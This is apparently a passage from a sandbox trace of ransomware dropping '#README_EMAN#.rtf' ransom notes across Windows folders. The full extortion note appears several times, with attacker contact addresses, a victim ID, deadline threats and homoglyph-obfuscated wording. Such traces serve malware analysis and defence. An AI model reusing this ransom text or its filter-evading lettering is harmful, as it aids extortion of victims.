{{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7fÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0271.325] WriteFile (in: hFile=0x27c, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0271.326] CloseHandle (hObject=0x27c) returned 1 [0271.326] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\#README_EMAN#.rtf" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\#readme_eman#.rtf")) returned 0x20 [0271.326] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\x-none.16\\#README_EMAN#.rtf" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\x-none.16\\#readme_eman#.rtf")) returned 0x20 [0271.326] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\#README_EMAN#.rtf" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\x-none.16\\#readme_eman#.rtf")) returned 0x20 [0271.326] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\MF\\#README_EMAN#.rtf" (normalized: "c:\\users\\all users\\microsoft\\mf\\#readme_eman#.rtf")) returned 0x20 [0271.326] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\#README_EMAN#.rtf" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\#readme_eman#.rtf")) returned 0x20 [0271.326] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\#README_EMAN#.rtf" (normalized: "c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\#readme_eman#.rtf")) returned 0x20 [0271.326] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Windows Live\\#README_EMAN#.rtf" (normalized: "c:\\users\\all users\\microsoft\\windows live\\#readme_eman#.rtf")) returned 0xffffffff [0271.327] GetLastError () returned 0x2 [0271.327] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Windows Live\\#README_EMAN#.rtf" (normalized: "c:\\users\\all users\\microsoft\\windows live\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0271.396] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0271.396] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0271.396] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is 